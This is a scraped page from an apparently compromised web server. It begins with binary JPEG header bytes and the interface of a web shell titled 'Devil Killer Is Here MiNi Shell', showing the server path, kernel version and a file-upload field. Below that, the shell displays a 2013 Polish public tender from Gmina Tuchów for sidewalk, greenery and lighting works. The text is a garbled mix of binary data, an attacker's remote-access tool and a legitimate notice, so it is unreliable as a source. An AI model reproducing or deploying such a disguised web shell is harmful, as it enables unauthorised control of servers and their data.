JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130628/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130628/249950-N-2013.html

<p class="kh_header"><b>Tuchów: Przebudowa chodników, zieleni publicznej wraz z małą architekturą i instalacją energetyczną zlokalizowanych na dz. nr 1756/1, 1756/2, 1756/3, 1756/4, 1756/5, 1756/6 w Tuchowie</b><br>
<b>Numer ogłoszenia: 249950 - 2013; data zamieszczenia: 28.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa chodników, zieleni publicznej wraz z małą architekturą i instalacją energetyczną zlokalizowanych na dz. nr 1756/1, 1756/2, 1756/3, 1756/4, 1756/5, 1756/6 w Tuchowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest projekt pn: Przebudowa chodników, zieleni publicznej wraz z małą architekturą i instalacją energetyczną zlokalizowanych na dz. nr 1756/1, 1756/2, 1756/3, 1756/4, 1756/5, 1756/6  w Tuchowie w zakresie

Roboty pomiarowe
-roboty pomiarowe przy powierzchniowych robotach ziemnych-koryta pod nawierzchnie placów postojowych - 0,5 ha,
-roboty pomiarowe przy powierzchnniowych robotach ziemnych-koryta pod powierzchnie placów postojowych
-geodezyjna inwentaryzacja powykonawcza - 0,5 ha.

Roboty rozbiórkowe
-rozebranie krawężników betonowych na podsypce cementowo-piaskowej - 23 m,
-rozebranie chodników z płyt betonowych o wymiarach 35x35x5cm na podsypce piaskowej - 190 m2,
-rozebranie obrzeży trawnikowych o wymiarach 8x30 cm na podsypce piaskowej- 10m,
-rozbiórka elementów konstrukcji betonowych niezbrojonych o grubości ponad 15cm - rozbiórka schodów betonowych 3m2,
-ręczna rozbiórka elementów konstrukcji betonowych niezbrojonych o grubości ponad 15cm-rozbiórka ścianek-kamiennych gr.od  
 25-60cm - 20 m3,
-mechaniczne ścinanie drzew z karczowaniem pni o srednicy 36-45cm - 4 szt,
-usunięcie warstwy ziemi urodzajnej (humusu)o grubości do 15 cm za pomocą spycharek - 80 m2,

Roboty ziemne
-wykonanie nasypu z gruntu dowiezionego - 60 m3,
-wykopy liniowe o szerokości 0,8-2,5m i głebokości do 1,5m o ścianach pionowych w gruntach suchych kat.III-IV z ręcznym  
 wydobyciem urobku-wykopy liniowe pod fundamenty schodów i ściany oporowej 4,4 m3,
-wywiezienie ziemi i gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowawczym 
 na odległość 1 km - 40 m3,
Roboty budowlane
-deskowanie tradycyjne schodów prostych na płycie - 2 m2,
-zbrojenie konstrukcji monolitych prętami stalowymi okrągłymi gładkimi o śr.do 14 mm
-zbrojenie schodów pretami fi 10-A-II-0.170 t,
-betonowanie schodów prostych zbrojonych w deskowaniu tradycyjnym
-betonowanie schodów-grubość ścianki do 20 cm- 4 m3,
-deskowanie tradycyjne ścian prostych betonowych lub żelbetowych-deskowanie ścianki oporowej - 8 m2,
-betonowanie ścian prostych niezbrojonych w deskowaniu tradycyjnym
-betonowanie ściany oporowej gr.40cm-4,4 m3,
-tynki zewnetrzne na ścianach płaskich i pow.poziomych zwykłe III kategorii
-szpachlowanie na gładko powierzchni licowych betonowych ściany oporowej i podstopnic schodów - 10 m2,
-malowanie tynków zewnętrznych gładkich farbami akrylowami
-dwukrotne malowanie farbą do betonu powierzchni podstopnic schodów i ściany oporowej - 10 m2,

Roboty nawierzchniowe
-koryta wykonywane ręcznie dł.20cm w gruncie kat.III-IV na całej szerokości jezdni i chodników 
-przygotowanie koryta ziemnego wraz z plantowaniem pod nawierzchnię placu - 400 m2,
-profilowanie i zagęszczanie podłoża wykonywane ręcznie w gruncie kat II-IV pod warstwy konstrukcyjne nawierzchni - 400 m2,
-warstwa górna podbudowy z kruszyw łamanych gr.15 cm-podbudowa pod kostkę brukową -400 m2,
-podbudowy betonowe gr 15 cm pielęgnowane piaskiem i wodą-podbudowa betonowa B-15 pod nawierzchnię z płyt piaskowca -21m2 ,
-licowanie płytkami klinkierowymi 25x12cm ścian i elementów zewnętrznych-układanie płyt piaskowca gr.5cm na zaprawie klejowej mrozoodpornej - 33 m2,
-obrzeża betonowe o wymiarach 30x8cm na podsypce cementowo-piaskowej,spoiny wypełnione zaprawą cementową - 90m,
-chodniki z kostki brukowej betonowej grubości 8cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem
-chodniki z kostki granitowej szarej 8/11-0,22t/m2 -313m2 - 69.59 t,
-chodniki z kostki brukowej betonowej gr.6cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem - chodniki z kostki granitowej 4/6-0,13t/m2 - 10 m2 - 1.25 t,
Zieleń
-humusowanie z obsianiem przy grubości warstwy humusu 10 cm - 50m2,
-wykonanie krat osłonowych na drzewa - 3 szt ,  
1.OŚWIETLENIE POMNIKA (6 OPRAW DO GRUNTU, 70W, 230V, WANDALOODPORNE, IP65.
2.OŚWIETLENIE ZIELENI PRZYLEGŁEJ DO DRZEW (5OPRAW DO GRUNTU, 70W, 230V, WANDALOODPORNE,IP65)
Tablice-RG 
-urządzenia rozdzielcze (zestawy) o masie ponad 20 kg na fundamencie prefabrykowanym EMITER - 2 szt xRSZ 40 x60 , 1 szt x KRA 40x 85  - szt 1,
-rozłącznik lub wyłącznik przeciwporażeniowy 3 (4)-biegunowy w rozdzielnicach - szt 3,
-wyłącznik nadprądowy 1-biegunowy w rozdzielnicachkontrolka napięcia 3x L300 - szt 3,
-wyłącznik nadprądowy 1-biegunowy w rozdzielnicach -S301 B6A, S 301 C10, 3 x S 301 B16A - szt 5,
-rozłącznik lub wyłącznik przeciwporażeniowy 3 (4)-biegunowy w rozdzielnicach- 2x S 303 B16, S 303 C20A-  szt 3,
-dodatkowe wyposażenie rozdzielnic modułowych - szyna nośna TH 35 - szt 2,
-dodatkowe wyposażenie rozdzielnic modułowych - listwa przyłączowa (zaciskowa) PEN - szt 1,
-aparaty elektryczne o masie do 5 kg-ukł.2 x zestaw gniazd siłowych 3x16 A Z wyłącznikiem 0-1, 3 szt x gniazdo 230V podwójne - szt1,
-dodatkowe wyposażenie rozdzielnic modułowych - szyna łączeniowa 3
-biegunowa - szt 1,
-aparaty elektryczne o masie do 5 kg-ukł. sterujący oświetleniem placu - szt 1,
-aparaty elektryczne o masie do 5 kg- płyty montażowe,maskujące - szt 1.

Rury i przewody

-kopanie rowów  dla kabli w sposób ręczny w gruncie kat.I-II - 30,72 m3,
-zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat.III - 23,04 m3,
-nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - 7,68 m3,
-rury ochronne z PCW o śr.do 80 mm - a75( z dwoma kawałkami po 2m rezerwa dla dalszej rozbudowy od RG) - 7 m,
-układanie kabli o masie do 1.0 kg/m w rowach kablowych ręcznie: YKY4x10 mm2 - 12 m,
-układanie kabli o masie do 0.5 kg/m w rowach kablowych ręcznie - YKY 3x 2,5 mm2 - 130 m,
-przewody uziemiające i wyrównawcze w kanałach lub tunelach luzem (bednarka o przekroju do 120 mm2)-zacisk PEN rozdzielnicy TG - 20 m,
-mechaniczne pogrążanie uziomów pionowych prętowych w gruncie kat III- 6*2*1,5m - 18 m,

Oprawy

-sprawdzenie i pomiar 3-fazowego obwodu elektrycznego niskiego napięcia 
-wyłączenie obwodu - 1 pomiar,
-demontaż istniejących słupów oświetleniowych o masie do 100 kg, pa  - szt 3,
-kompletowanie opraw świetlówkowych do 120 W - szt 11 kpl,
-montaż opraw stylowych na murkach, fundamentach,elementach ogrodzenia
-oprawy dogruntowe - szt 11,
-transport gruzu z terenu rozbiórki przy ręcznym załadowaniu i wyładowaniu samochodem dostawczym na odl.do 1  km-wywóz  fundamentów i słupów latarń -3kpl - 2 m3,
-transport gruzu z terenu rozbiórki przy ręcznym załadowaniu i wyładowaniu samochodem dostawczym - dod.za każdy nast.rozp. 1 km -  Krotność = 10  - 2 m3

Pomiary

-Badanie linii kablowej nn o ilości żył 4 - 1 odcinek
-Badanie linii kablowej nn o ilosci żył 3 - 10 odcinek
-Pierwszy pomiar uziemienia ochronnego lub roboczego - 1 pomiar
-Sprawdzenie samoczynnego wyłączenia zasilania - pierwsza próba działania wyłącznika różnicowoprądowego - 1 próba
-Sprawdzenie samoczynnego wyłączenia zasilania - następna próba działania wyłącznika różnicowoprądowego - 1 próba 
-Sprawdzenie samoczynnego wyłączania zasilania (pierwsza próba) - 1 próba 
-Sprawdzenie samoczynnego wyłączania zasilania (następna próba) - 10 prób 


KOD  CPV -   45233222-1    
KOD CPV-     45310000-3.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:

- aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie wymaganej wiedzy i doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał   co  najmniej 1 robotą remontowo- budowlaną  podobną z rodzaju i zakresu co przedmiot  zamówienia.
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.
Ocena  tego warunku będzie dokonana  na  podstawie:
- wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób  należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;

Do  każdej  pozycji  wyszczególnionej  w  załączniku  nr  4   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania  odpowiednim potencjałem technicznym    do  wykonania  zamówienia-    Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednim  potencjałem  technicznym  do  wykonania  niniejszego  zamówienia. 

Zamawiający  nie  wyznacza  szczegółowego  warunku  w  tym  zakresie  i  nie  żąda  dokumentów  wykazujących  spełnienie  przez  wykonawcę  w/w  warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia -  Zamawiający  wymaga, aby  wykonawca  dysponował:
-kierownikiem  budowy  posiadającym  uprawnienia  budowlane  w  specjalności  drogowej 
- posiadaniem  lub  dysponowaniem odpowiednią  ilością  osób  (pracowników fizycznych) zdolnych  do  wykonania zamówienia 

Ocena tego warunku będzie dokonana w oparciu o:
- oświadczenie wykonawcy , że osoby, które będą uczestniczyć w wykonywaniu zamówienia , posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez  nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; - załącznik  nr 6 SIWZ.

Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi                  do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.

W przypadku  nie dysponowania  osobami zdolnymi do wykonania zamówienia ,oraz nie posiadania potencjału technicznego należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia  potencjału technicznego i osób  zdolnych  do wykonania zamówienia.
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wymaganej sytuacji ekonomicznej i finansowej - Zamawiający wymaga , aby wykonawca przedłożył w swojej ofercie oświadczenie iż znajduje się w dobrej kondycji finansowej i ekonomicznej. 
Potwierdzenie spełnienia tego warunku zostanie dokonane w oparciu o dokument o nazwie: Oświadczenie - załącznik  nr 3 będący załącznikiem do SIWZ.
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1). Projekt  umowy stanowi załącznik do Specyfikacji  Istotnych  Warunków Zamówienia.  W jej treści, która nie podlega negocjacjom podano wszelkie istotne dla zamawiającego warunki realizacji zamówienia.
2). Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty w następujących  okolicznościach:
1.Konieczności  wykonania  robót  budowlanych  w  przypadku:
a). wystąpieniem  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  robót  dodatkowych, nie  objętych  zamówieniem  podstawowym, których  wykonanie  stanie  się  konieczne  na  skutek  sytuacji  niemożliwej  wcześniej  do  przewidzenia, a  wykonanie  zamówienia  podstawowego  będzie  uzależnione  od  wykonania  zamówienia  dodatkowego.
b) działaniem  zdarzeń  losowych
c). niekorzystnymi  warunkami  atmosferycznymi  uniemożliwiającymi  przeprowadzenie  w  terminie  ustalonych robót  budowlanych
d). gdy  w  wyniku  rozliczenia    udzielonej  dotacji   i  wynikającym  stąd  ostatecznym  terminem rozliczenia   nie  jest  możliwe  dotrzymanie  umownego  terminu  wykonania  umowy.
2. Zmniejszenia  zakresu  umownego  robót  z  przyczyn  technicznych  lub  gospodarczych  niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego.
3. Zmiany ustawowej stawki podatku VAT
4. Z uwagi na niezależne od stron okoliczności (nieprzewidziane zmiany organizacyjne, wypadki losowe) dotyczące osób kluczowych dla realizacji umowy. 
5. Zmniejszenia wysokości wynagrodzenia przewidzianego w umowie, spowodowanego koniecznością zmniejszenia zakresu umownego robót. 
Wszelkie powyższe zmiany te mogą nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow /zamówienia publiczne + ogłoszenia /<br>
